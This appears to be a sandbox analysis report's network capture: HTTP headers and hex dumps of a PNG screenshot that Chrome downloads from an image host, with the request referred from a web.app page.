                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://facture-75823.web.app/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:07 UTC380INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 25 Mar 2025 14:45:07 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 363482
                                                        Connection: close
                                                        Last-Modified: Tue, 11 Feb 2025 13:50:22 GMT
                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                        Cache-Control: max-age=315360000
                                                        Cache-Control: public
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, OPTIONS
                                                        Accept-Ranges: bytes
                                                        2025-03-25 14:45:07 UTC3716INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 80 00 00 01 3b 08 06 00 00 00 4d 28 30 08 00 00 00 b4 65 58 49 66 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 f2 76 01 00 e8 03 00 00 f2 76 01 00 e8 03 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 80 02 00 00 03 a0 04 00 01 00 00 00 3b 01 00 00 00 00 00 00 63 c5 51 f9 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 20 00 49 44 41 54 78
                                                        Data Ascii: PNGIHDR;M(0eXIfII*V^(ifvv02100100;cQpHYsod IDATx
                                                        2025-03-25 14:45:07 UTC4096INData Raw: 85 b9 4f 44 03 7b 54 03 2b 65 11 4b 18 b4 f7 a8 61 eb eb 86 8d 50 67 1f e8 a6 d4 8a 6f a5 4d fa 0e c2 9e 43 49 ab 08 96 12 01 64 7a 90 3e f3 9c c3 dd 70 13 00 05 04 3d 23 1a 05 f2 bc c3 5a c5 17 20 f4 0d 71 dc 08 97 2e d1 88 d4 d1 c2 cf 3c 3f e1 d1 37 60 80 a7 8f 80 29 ea d5 28 be 87 79 01 79 e4 cb 7d 95 47 bf 84 c7 9e 61 13 65 44 ef b0 f9 62 14 70 80 70 38 a4 00 9f 15 c3 84 c4 a1 71 01 3f 0b 46 08 8b a3 12 ed 1b b7 2a 91 be 71 fa e3 ac 37 c1 f2 84 92 be 03 53 f4 a7 e8 0b 08 4e b2 ee c4 94 4b 89 04 ca 63 e2 de b9 47 c0 51 e6 45 09 81 0a f4 cd 45 03 c5 26 e4 20 f0 d9 11 98 b4 c2 37 69 86 7f 92 7d 9f e0 b9 4f aa e0 9e ec a0 3a e1 9e 68 a3 6d 81 73 82 1a 6f 84 43 01 c0 62 18 47 f3 a0 1b ca 45 47 5f 26 5a 7b b7 a3 2d fe 32 5a fa df 80 6a 24 03 e6 f1 7d 04 c6
                                                        Data Ascii: OD{T+eKaPgoMCIdz>p=#Z q.<?7`)(yy}GaeDbpp8q?F*q7SNKcGQEE& 7i}O:hmsoCbGEG_&Z{-2Zj$}
                                                        2025-03-25 14:45:07 UTC4096INData Raw: 81 dc 3b e1 c9 9d 0f 77 ce 7c 58 73 e7 c1 52 bd 0a a6 86 d5 e8 2c 9e 87 96 f2 f9 68 a9 ba 03 6d f5 2b 50 df b4 16 6d fa 47 50 5c fe 24 b2 33 9f 40 ab 27 0b cd 8e 5c b4 2b bf d1 57 0a ad ab 16 16 4f 23 1c 84 34 7f b0 11 c1 50 13 61 af 03 91 90 1a c1 60 37 d3 5a f8 94 77 fe 08 7c be 56 e8 7c 75 0a f0 a9 fc 54 a0 04 9d 81 72 b4 fb 8a d1 c6 b4 f8 6d 04 48 55 a0 1a 5d 62 05 fc 7c 8d 50 8b 0d 34 43 13 6c 82 9a 56 1d 90 08 60 15 5a 6c 45 68 d2 e7 a0 aa 7b 27 2a 3b b7 a1 aa eb 75 54 aa b6 a2 ae 9b 00 68 48 43 8d ea 0d 02 60 7f 62 81 fd 81 08 e0 95 00 e5 7a 16 48 d9 ef 8b 2f be b8 b8 ff d7 5f 7f ad ac 27 97 b6 25 6b 4b 32 8a 71 f9 f6 43 8b ef 8f 05 c3 24 dc 5c 0a 52 c9 4d d6 c1 8b d1 94 1f 09 2b 3f 04 bc d7 d3 a6 8c 93 6c a7 4e 9d fa ce 18 5d 0e 33 67 ce 9c 51 c6
                                                        Data Ascii: ;w|XsR,hm+PmGP\$3@'\+WO#4Pa`7Zw|V|uTrmHU]b|P4ClV`ZlEh{'*;uThHC`bzH/_'%kK2qC$\RM+?lN]3gQ
                                                        2025-03-25 14:45:07 UTC4096INData Raw: 80 a5 d0 12 00 35 de 0a e5 1b bf 1a 6f 8d 12 a9 93 f7 fa f4 c1 3a 02 60 23 b4 84 3d 2d 21 4e 4f d0 d3 87 c5 b6 2a 20 68 94 a8 5f b8 95 20 d8 09 23 61 4f 00 b0 c5 4c 00 ac ab 80 ad 57 ad c0 a1 29 d4 35 07 81 6d 6c 43 7e 22 a6 0e 6a 82 66 bb 8b 00 48 f0 ab 34 be 8c 7a cb ab 28 d2 3d 83 89 6b 44 00 93 5b f2 17 22 2e 57 12 18 ae b7 ec 6a f5 2f cd bb 56 9b 97 d6 b9 bc 7f 3f 66 bb 56 ff ae e7 78 57 5a f8 af d5 df 4b 7f 46 e7 87 8e 75 3d ba 56 df 2f 07 b8 1f 33 36 57 ba 16 3f a5 6f 3f 74 7d 7f 4a ff be b9 70 1e ef ea f5 78 b7 b9 05 1f fa 83 c9 06 ae 79 2e 57 eb d3 d5 ce f1 7a e6 dd b5 e6 43 32 0a 2d 40 f6 af ff fa af ca 3b 7a 57 fa 69 97 e4 cf c1 5c c9 bf de f2 4b 7f 06 46 de 1f 54 8e 4f 7d e5 6d c4 e9 86 17 71 ae fb 35 cc 1a d2 30 6b db f7 dd df 01 4c fe 0c 4c
                                                        Data Ascii: 5o:`#=-!NO* h_ #aOLW)5mlC~"jfH4z(=kD[".Wj/V?fVxWZKFu=V/36W?o?t}Jpxy.WzC2-@;zWi\KFTO}mq50kLL
                                                        2025-03-25 14:45:07 UTC4096INData Raw: cb 4b 98 6d dd 81 59 6d 06 ce da 0a 71 d6 5d 86 b3 de b2 14 00 a6 94 52 4a 3f 57 7d 80 f7 df 7b 07 86 c1 6c 02 df eb e8 ea df 45 18 cc 84 6a 60 2f b5 8f 7e 3e 34 03 f9 50 d1 76 f7 11 22 fa f3 d0 d9 b7 17 5d bd 7b 69 f7 a0 b3 37 3b 01 85 84 c1 c6 d8 1b 68 88 be 84 86 c8 0b d4 d3 e8 08 6e 81 3e f2 24 9a 7d f7 a3 d1 bd 11 b6 e0 a3 f0 eb 17 c3 df f4 7b f4 55 df 88 99 bd 04 c0 2c 02 60 36 e1 2f 9b 60 97 bd 81 5a a7 a4 0f 29 e9 4b 94 25 65 eb 13 75 b3 d6 2b 69 f1 a7 09 89 c7 f2 36 c2 fb d2 46 b4 be f0 30 ac d6 02 d4 69 6b d1 6a 68 81 91 90 d0 aa 27 7c 51 46 3b c1 ce d9 48 f8 6b 85 9d 80 66 f3 b5 c2 e9 13 e8 6a 27 74 b5 12 b8 aa 09 7e 15 30 fb 09 24 fe 6a d8 a3 0d 68 35 56 e0 40 65 01 8a ea ca 51 58 53 81 fc ca 22 e4 16 15 21 6b 5f 11 32 f7 16 22 ab a0 04 f9 15
                                                        Data Ascii: KmYmq]RJ?W}{lEj`/~>4Pv"]{i7;hn>$}{U,`6/`Z)K%eu+i6F0ikjh'|QF;Hkfj't~0$jh5V@eQXS"!k_2"
                                                        2025-03-25 14:45:07 UTC4096INData Raw: 9a 71 06 4f b4 a7 f1 74 e1 73 3c 59 78 1f 3f 2c be 81 1f 8c 6f e3 89 eb 0c 1e 47 6e 1d 03 f0 38 8e e3 38 7e c2 41 00 a6 56 88 0e c2 2f 40 f8 f9 05 fe 9a c4 5f 43 87 50 93 37 da 06 6f ba cb 66 96 66 be ae e7 7e 84 05 43 00 d0 53 17 10 9c 81 bb 36 03 a7 c8 0a 2e 29 60 2e f7 c3 54 ee 81 31 7f 0d a6 e4 a7 b0 e5 4f 43 9f 3b 07 67 fe 2c 62 89 13 88 f8 5f 46 ce f6 22 36 86 5e c5 8e 80 5e ef eb 12 f4 b6 7b df 60 70 b9 97 db ee 88 6d 6f c8 00 24 08 37 b9 7d 4b 6c 7f 16 b7 65 1c 6e 74 bf 8e dd 7e fe bc ce 2f e0 38 7f 0b 5e 42 c6 53 9d 96 a6 78 d3 e8 47 31 3e 39 8d 71 b5 15 53 5a 1f f4 f6 00 6c 5e 3f f7 11 bd 46 fd 48 d4 03 88 88 76 77 69 9b 84 bf 68 91 db 57 88 34 d1 2b 35 23 7a 00 eb 11 cc 6a e0 17 00 4c 4d 13 81 73 12 04 a5 39 7e c3 0b d0 b9 88 4c 83 12 d7 fb 6f
                                                        Data Ascii: qOts<Yx?,oGn88~AV/@_CP7off~CS6.)`.T1OC;g,b_F"6^^{`pmo$7}Klent~/8^BSxG1>9qSZl^?FHvwihW4+5#zjLMs9~Lo
                                                        2025-03-25 14:45:07 UTC4096INData Raw: 00 1b f1 64 0f 7b e1 88 78 e1 8c b9 b9 cd 03 47 dc 05 4f d2 05 57 c2 c9 70 c0 19 77 c0 95 72 61 ca bc 80 ce 5b bd 18 d2 f4 a3 f3 72 07 4e 7f 79 06 5f 7c f5 15 be fa f2 73 9c 3d 7d 1a 67 cf 7e 8e 8b 57 05 04 2f a2 7b b0 13 03 13 1d 18 99 b9 8e c9 c5 eb d0 1b 7b e0 b0 8d 20 ec 26 04 83 31 54 d2 44 60 69 0d f5 ca 5d d4 ca 2b 58 2a 94 09 c3 34 6a a9 14 2a a9 2c ca f1 1c 32 b1 18 22 91 00 c2 3c be 70 d8 85 44 cc 4f 04 86 10 8f 05 10 8d f8 a5 4c 5f 20 44 c4 8a 0c 60 c0 2d b5 05 0c 04 9c 08 f8 ad f0 fa f5 70 06 08 32 ef 30 4c 44 9f d6 7b 11 7a ff 45 58 42 57 88 bf 6b b0 46 bb 08 c0 5e 38 7c 23 70 ba d4 70 da 09 79 db 14 1c 16 0d 1c e6 09 58 cc 23 30 98 fa b0 68 ee c2 82 f9 3c a6 2c a7 31 65 3f 85 29 f7 39 42 50 fc bc db 30 78 09 3b 8f 0a 76 ef 34 9c 11 46 62 86
                                                        Data Ascii: d{xGOWpwra[rNy_|s=}g~W/{{ &1TD`i]+X*4j*,2"<pDOL_ D`-p20LD{zEXBWkF^8|#ppyX#0h<,1e?)9BP0x;v4Fb
                                                        2025-03-25 14:45:07 UTC4096INData Raw: 4c c5 2f 63 36 7d 9d 20 bc 01 6d ae 07 a6 02 31 48 78 da 8b 0a 69 06 10 57 71 12 9e 92 40 e0 02 c2 e5 45 1e cf 3c 22 79 1e 5f 4e cd 18 43 30 73 07 be 74 0f cb 5e 44 73 7c 90 28 8c 20 53 1a 41 5a 20 70 69 84 58 50 20 57 27 04 97 27 b8 3c 85 cc f2 14 21 38 87 7c 73 81 00 d4 31 0c 28 35 8c a8 57 6d 58 29 b8 71 37 e3 23 42 42 d8 4c c4 b0 13 25 00 c3 f2 74 6e d2 e0 ce cf ab 7f 65 00 ca 53 ba 3d 43 60 7b bc bf 67 63 fc b5 21 28 da fa ed 15 da cb b9 9a d4 3b f8 a0 3d 34 8c 68 13 28 0d 04 2d f5 06 5e 91 ab 82 6b 2b ed f1 00 d7 e4 4e 21 d2 b8 80 6d 00 0a 0c 4a e5 7a 7b 5d 86 e2 be 04 be 15 39 1a f2 60 d2 02 7e 52 2c 89 19 46 04 32 79 1c a5 25 b4 0a 55 ec e6 ca d8 c9 e5 b1 9d ce 61 3b 95 c5 76 22 85 ed 68 02 5b c1 38 b6 7c 31 6c bb 22 d8 b1 05 b1 63 14 c3 e0 78 b0
                                                        Data Ascii: L/c6} m1HxiWq@E<"y_NC0st^Ds|( SAZ piXP W''<!8|s1(5WmX)q7#BBL%tneS=C`{gc!(;=4h(-^k+N!mJz{]9`~R,F2y%Ua;v"h[8|1l"cx
                                                        2025-03-25 14:45:07 UTC4096INData Raw: b1 20 36 0a 49 ac 64 79 ad 89 0c 60 8a 0f 9d 49 37 fc 21 fe 4d a6 f9 f0 c1 ef 3a ce bf ad a0 98 9d a7 a8 43 b8 c0 eb 2a a5 81 3d c0 87 0b fb 0d 5e cf 57 e1 75 74 22 64 bf 80 ac ed 0c 8a fa 8f 50 99 79 1b ab ca 57 d0 52 be 80 af 27 5e c3 37 5c fe a3 e2 15 fc eb 98 0c c0 6f 47 7e 8b 87 e3 6f e0 91 e6 3d 3c 9a f9 54 ca 00 1e 11 82 52 cc 7e 81 43 ed 65 c6 25 3c 9e 39 81 a7 ca d7 f1 c3 e8 af f1 74 e4 37 32 00 c5 fe a6 eb 38 b4 f6 48 6d fe 44 1c d9 6e 48 e3 00 3e 0c 29 f1 30 32 81 47 61 15 1e 05 c7 b9 3e 4c 00 4e e0 db cc f8 31 00 8f e3 38 8e e3 27 1c 04 60 7d 9d 4f dc ab 62 28 98 90 84 c0 67 55 bf f1 b5 e0 f3 4e 1f 31 69 59 80 f0 19 fa 02 32 02 59 4a d5 bf 52 f6 8f 37 ec a6 4f 1a 1f 30 d2 f0 3e af 0a 0e d4 08 13 22 d0 16 ec 91 b2 80 b1 d0 49 6c cd 9c 24 e2 4e
                                                        Data Ascii: 6Idy`I7!M:C*=^Wut"dPyWR'^7\oG~o=<TR~Ce%<9t728HmDnH>)02Ga>LN18'`}Ob(gUN1iY2YJR7O0>"Il$N
                                                        2025-03-25 14:45:07 UTC4096INData Raw: f1 19 0e 02 70 89 00 ac 13 6c c5 49 3f f2 92 05 e4 34 a9 8a 79 7d ad ba 80 53 ab fd 02 ae 75 0a ad 8a 7f 5b 43 c2 45 a6 78 e1 9d 68 75 11 23 f5 fd 82 13 ad 86 1f 21 95 f9 b3 23 20 f8 ab 99 e0 2d 13 62 0c 5f 76 10 96 ae 07 30 73 fa 61 9c 1d d8 88 25 81 5d df 06 15 2b 82 bf d5 f9 4f 96 c9 54 65 0a 37 fe 08 81 7d ad e7 2c 76 6e c0 2b a3 cf 21 ba f3 41 68 b7 3c 8e 6c f5 14 82 95 7e 78 c2 3a f8 e2 63 48 4d 69 89 13 0b c2 7e 29 4e b2 21 33 e9 40 3c 67 41 a2 39 80 68 46 ba 4e e1 b1 e7 dc 08 57 09 a7 98 53 d5 b3 8b 36 e5 e2 63 83 83 40 f2 c5 6d 08 8e 13 36 8b 49 e4 96 52 aa e8 37 56 6c 15 fb 4a 44 4b d2 d8 43 00 c8 73 23 99 3f 85 3f 29 26 4e 23 35 13 43 6a b6 88 74 23 47 f8 da 89 46 13 a2 29 ee d7 37 00 8d 7e 1b 74 c6 f5 d0 9a 0e 40 a7 eb 26 36 7b f8 7a 7d 70 85
                                                        Data Ascii: plI?4y}Su[CExhu#!# -b_v0sa%]+OTe7},vn+!Ah<l~x:cHMi~)N!3@<gA9hFNWS6c@m6IR7VlJDKCs#??)&N#5Cjt#GF)7~t@&6{z}p


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.749707207.174.26.2194432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:09 UTC417OUTGET /6cXYk9HM/Capture-d-cran-2025-02-11-144928.png HTTP/1.1
                                                        Host: i.ibb.co
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:09 UTC380INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 25 Mar 2025 14:45:09 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 363482
                                                        Connection: close
                                                        Last-Modified: Tue, 11 Feb 2025 13:50:22 GMT
                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                        Cache-Control: max-age=315360000
                                                        Cache-Control: public
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, OPTIONS
                                                        Accept-Ranges: bytes
                                                        2025-03-25 14:45:09 UTC3716INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 80 00 00 01 3b 08 06 00 00 00 4d 28 30 08 00 00 00 b4 65 58 49 66 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 f2 76 01 00 e8 03 00 00 f2 76 01 00 e8 03 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 80 02 00 00 03 a0 04 00 01 00 00 00 3b 01 00 00 00 00 00 00 63 c5 51 f9 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 20 00 49 44 41 54 78
                                                        Data Ascii: PNGIHDR;M(0eXIfII*V^(ifvv02100100;cQpHYsod IDATx
                                                        2025-03-25 14:45:09 UTC4096INData Raw: 85 b9 4f 44 03 7b 54 03 2b 65 11 4b 18 b4 f7 a8 61 eb eb 86 8d 50 67 1f e8 a6 d4 8a 6f a5 4d fa 0e c2 9e 43 49 ab 08 96 12 01 64 7a 90 3e f3 9c c3 dd 70 13 00 05 04 3d 23 1a 05 f2 bc c3 5a c5 17 20 f4 0d 71 dc 08 97 2e d1 88 d4 d1 c2 cf 3c 3f e1 d1 37 60 80 a7 8f 80 29 ea d5 28 be 87 79 01 79 e4 cb 7d 95 47 bf 84 c7 9e 61 13 65 44 ef b0 f9 62 14 70 80 70 38 a4 00 9f 15 c3 84 c4 a1 71 01 3f 0b 46 08 8b a3 12 ed 1b b7 2a 91 be 71 fa e3 ac 37 c1 f2 84 92 be 03 53 f4 a7 e8 0b 08 4e b2 ee c4 94 4b 89 04 ca 63 e2 de b9 47 c0 51 e6 45 09 81 0a f4 cd 45 03 c5 26 e4 20 f0 d9 11 98 b4 c2 37 69 86 7f 92 7d 9f e0 b9 4f aa e0 9e ec a0 3a e1 9e 68 a3 6d 81 73 82 1a 6f 84 43 01 c0 62 18 47 f3 a0 1b ca 45 47 5f 26 5a 7b b7 a3 2d fe 32 5a fa df 80 6a 24 03 e6 f1 7d 04 c6
                                                        Data Ascii: OD{T+eKaPgoMCIdz>p=#Z q.<?7`)(yy}GaeDbpp8q?F*q7SNKcGQEE& 7i}O:hmsoCbGEG_&Z{-2Zj$}
                                                        2025-03-25 14:45:09 UTC4096INData Raw: 81 dc 3b e1 c9 9d 0f 77 ce 7c 58 73 e7 c1 52 bd 0a a6 86 d5 e8 2c 9e 87 96 f2 f9 68 a9 ba 03 6d f5 2b 50 df b4 16 6d fa 47 50 5c fe 24 b2 33 9f 40 ab 27 0b cd 8e 5c b4 2b bf d1 57 0a ad ab 16 16 4f 23 1c 84 34 7f b0 11 c1 50 13 61 af 03 91 90 1a c1 60 37 d3 5a f8 94 77 fe 08 7c be 56 e8 7c 75 0a f0 a9 fc 54 a0 04 9d 81 72 b4 fb 8a d1 c6 b4 f8 6d 04 48 55 a0 1a 5d 62 05 fc 7c 8d 50 8b 0d 34 43 13 6c 82 9a 56 1d 90 08 60 15 5a 6c 45 68 d2 e7 a0 aa 7b 27 2a 3b b7 a1 aa eb 75 54 aa b6 a2 ae 9b 00 68 48 43 8d ea 0d 02 60 7f 62 81 fd 81 08 e0 95 00 e5 7a 16 48 d9 ef 8b 2f be b8 b8 ff d7 5f 7f ad ac 27 97 b6 25 6b 4b 32 8a 71 f9 f6 43 8b ef 8f 05 c3 24 dc 5c 0a 52 c9 4d d6 c1 8b d1 94 1f 09 2b 3f 04 bc d7 d3 a6 8c 93 6c a7 4e 9d fa ce 18 5d 0e 33 67 ce 9c 51 c6
                                                        Data Ascii: ;w|XsR,hm+PmGP\$3@'\+WO#4Pa`7Zw|V|uTrmHU]b|P4ClV`ZlEh{'*;uThHC`bzH/_'%kK2qC$\RM+?lN]3gQ
                                                        2025-03-25 14:45:09 UTC4096INData Raw: 80 a5 d0 12 00 35 de 0a e5 1b bf 1a 6f 8d 12 a9 93 f7 fa f4 c1 3a 02 60 23 b4 84 3d 2d 21 4e 4f d0 d3 87 c5 b6 2a 20 68 94 a8 5f b8 95 20 d8 09 23 61 4f 00 b0 c5 4c 00 ac ab 80 ad 57 ad c0 a1 29 d4 35 07 81 6d 6c 43 7e 22 a6 0e 6a 82 66 bb 8b 00 48 f0 ab 34 be 8c 7a cb ab 28 d2 3d 83 89 6b 44 00 93 5b f2 17 22 2e 57 12 18 ae b7 ec 6a f5 2f cd bb 56 9b 97 d6 b9 bc 7f 3f 66 bb 56 ff ae e7 78 57 5a f8 af d5 df 4b 7f 46 e7 87 8e 75 3d ba 56 df 2f 07 b8 1f 33 36 57 ba 16 3f a5 6f 3f 74 7d 7f 4a ff be b9 70 1e ef ea f5 78 b7 b9 05 1f fa 83 c9 06 ae 79 2e 57 eb d3 d5 ce f1 7a e6 dd b5 e6 43 32 0a 2d 40 f6 af ff fa af ca 3b 7a 57 fa 69 97 e4 cf c1 5c c9 bf de f2 4b 7f 06 46 de 1f 54 8e 4f 7d e5 6d c4 e9 86 17 71 ae fb 35 cc 1a d2 30 6b db f7 dd df 01 4c fe 0c 4c
                                                        Data Ascii: 5o:`#=-!NO* h_ #aOLW)5mlC~"jfH4z(=kD[".Wj/V?fVxWZKFu=V/36W?o?t}Jpxy.WzC2-@;zWi\KFTO}mq50kLL
                                                        2025-03-25 14:45:09 UTC4096INData Raw: cb 4b 98 6d dd 81 59 6d 06 ce da 0a 71 d6 5d 86 b3 de b2 14 00 a6 94 52 4a 3f 57 7d 80 f7 df 7b 07 86 c1 6c 02 df eb e8 ea df 45 18 cc 84 6a 60 2f b5 8f 7e 3e 34 03 f9 50 d1 76 f7 11 22 fa f3 d0 d9 b7 17 5d bd 7b 69 f7 a0 b3 37 3b 01 85 84 c1 c6 d8 1b 68 88 be 84 86 c8 0b d4 d3 e8 08 6e 81 3e f2 24 9a 7d f7 a3 d1 bd 11 b6 e0 a3 f0 eb 17 c3 df f4 7b f4 55 df 88 99 bd 04 c0 2c 02 60 36 e1 2f 9b 60 97 bd 81 5a a7 a4 0f 29 e9 4b 94 25 65 eb 13 75 b3 d6 2b 69 f1 a7 09 89 c7 f2 36 c2 fb d2 46 b4 be f0 30 ac d6 02 d4 69 6b d1 6a 68 81 91 90 d0 aa 27 7c 51 46 3b c1 ce d9 48 f8 6b 85 9d 80 66 f3 b5 c2 e9 13 e8 6a 27 74 b5 12 b8 aa 09 7e 15 30 fb 09 24 fe 6a d8 a3 0d 68 35 56 e0 40 65 01 8a ea ca 51 58 53 81 fc ca 22 e4 16 15 21 6b 5f 11 32 f7 16 22 ab a0 04 f9 15
                                                        Data Ascii: KmYmq]RJ?W}{lEj`/~>4Pv"]{i7;hn>$}{U,`6/`Z)K%eu+i6F0ikjh'|QF;Hkfj't~0$jh5V@eQXS"!k_2"
                                                        2025-03-25 14:45:09 UTC4096INData Raw: 9a 71 06 4f b4 a7 f1 74 e1 73 3c 59 78 1f 3f 2c be 81 1f 8c 6f e3 89 eb 0c 1e 47 6e 1d 03 f0 38 8e e3 38 7e c2 41 00 a6 56 88 0e c2 2f 40 f8 f9 05 fe 9a c4 5f 43 87 50 93 37 da 06 6f ba cb 66 96 66 be ae e7 7e 84 05 43 00 d0 53 17 10 9c 81 bb 36 03 a7 c8 0a 2e 29 60 2e f7 c3 54 ee 81 31 7f 0d a6 e4 a7 b0 e5 4f 43 9f 3b 07 67 fe 2c 62 89 13 88 f8 5f 46 ce f6 22 36 86 5e c5 8e 80 5e ef eb 12 f4 b6 7b df 60 70 b9 97 db ee 88 6d 6f c8 00 24 08 37 b9 7d 4b 6c 7f 16 b7 65 1c 6e 74 bf 8e dd 7e fe bc ce 2f e0 38 7f 0b 5e 42 c6 53 9d 96 a6 78 d3 e8 47 31 3e 39 8d 71 b5 15 53 5a 1f f4 f6 00 6c 5e 3f f7 11 bd 46 fd 48 d4 03 88 88 76 77 69 9b 84 bf 68 91 db 57 88 34 d1 2b 35 23 7a 00 eb 11 cc 6a e0 17 00 4c 4d 13 81 73 12 04 a5 39 7e c3 0b d0 b9 88 4c 83 12 d7 fb 6f
                                                        Data Ascii: qOts<Yx?,oGn88~AV/@_CP7off~CS6.)`.T1OC;g,b_F"6^^{`pmo$7}Klent~/8^BSxG1>9qSZl^?FHvwihW4+5#zjLMs9~Lo
                                                        2025-03-25 14:45:09 UTC4096INData Raw: 00 1b f1 64 0f 7b e1 88 78 e1 8c b9 b9 cd 03 47 dc 05 4f d2 05 57 c2 c9 70 c0 19 77 c0 95 72 61 ca bc 80 ce 5b bd 18 d2 f4 a3 f3 72 07 4e 7f 79 06 5f 7c f5 15 be fa f2 73 9c 3d 7d 1a 67 cf 7e 8e 8b 57 05 04 2f a2 7b b0 13 03 13 1d 18 99 b9 8e c9 c5 eb d0 1b 7b e0 b0 8d 20 ec 26 04 83 31 54 d2 44 60 69 0d f5 ca 5d d4 ca 2b 58 2a 94 09 c3 34 6a a9 14 2a a9 2c ca f1 1c 32 b1 18 22 91 00 c2 3c be 70 d8 85 44 cc 4f 04 86 10 8f 05 10 8d f8 a5 4c 5f 20 44 c4 8a 0c 60 c0 2d b5 05 0c 04 9c 08 f8 ad f0 fa f5 70 06 08 32 ef 30 4c 44 9f d6 7b 11 7a ff 45 58 42 57 88 bf 6b b0 46 bb 08 c0 5e 38 7c 23 70 ba d4 70 da 09 79 db 14 1c 16 0d 1c e6 09 58 cc 23 30 98 fa b0 68 ee c2 82 f9 3c a6 2c a7 31 65 3f 85 29 f7 39 42 50 fc bc db 30 78 09 3b 8f 0a 76 ef 34 9c 11 46 62 86
                                                        Data Ascii: d{xGOWpwra[rNy_|s=}g~W/{{ &1TD`i]+X*4j*,2"<pDOL_ D`-p20LD{zEXBWkF^8|#ppyX#0h<,1e?)9BP0x;v4Fb
                                                        2025-03-25 14:45:09 UTC4096INData Raw: 4c c5 2f 63 36 7d 9d 20 bc 01 6d ae 07 a6 02 31 48 78 da 8b 0a 69 06 10 57 71 12 9e 92 40 e0 02 c2 e5 45 1e cf 3c 22 79 1e 5f 4e cd 18 43 30 73 07 be 74 0f cb 5e 44 73 7c 90 28 8c 20 53 1a 41 5a 20 70 69 84 58 50 20 57 27 04 97 27 b8 3c 85 cc f2 14 21 38 87 7c 73 81 00 d4 31 0c 28 35 8c a8 57 6d 58 29 b8 71 37 e3 23 42 42 d8 4c c4 b0 13 25 00 c3 f2 74 6e d2 e0 ce cf ab 7f 65 00 ca 53 ba 3d 43 60 7b bc bf 67 63 fc b5 21 28 da fa ed 15 da cb b9 9a d4 3b f8 a0 3d 34 8c 68 13 28 0d 04 2d f5 06 5e 91 ab 82 6b 2b ed f1 00 d7 e4 4e 21 d2 b8 80 6d 00 0a 0c 4a e5 7a 7b 5d 86 e2 be 04 be 15 39 1a f2 60 d2 02 7e 52 2c 89 19 46 04 32 79 1c a5 25 b4 0a 55 ec e6 ca d8 c9 e5 b1 9d ce 61 3b 95 c5 76 22 85 ed 68 02 5b c1 38 b6 7c 31 6c bb 22 d8 b1 05 b1 63 14 c3 e0 78 b0
                                                        Data Ascii: L/c6} m1HxiWq@E<"y_NC0st^Ds|( SAZ piXP W''<!8|s1(5WmX)q7#BBL%tneS=C`{gc!(;=4h(-^k+N!mJz{]9`~R,F2y%Ua;v"h[8|1l"cx
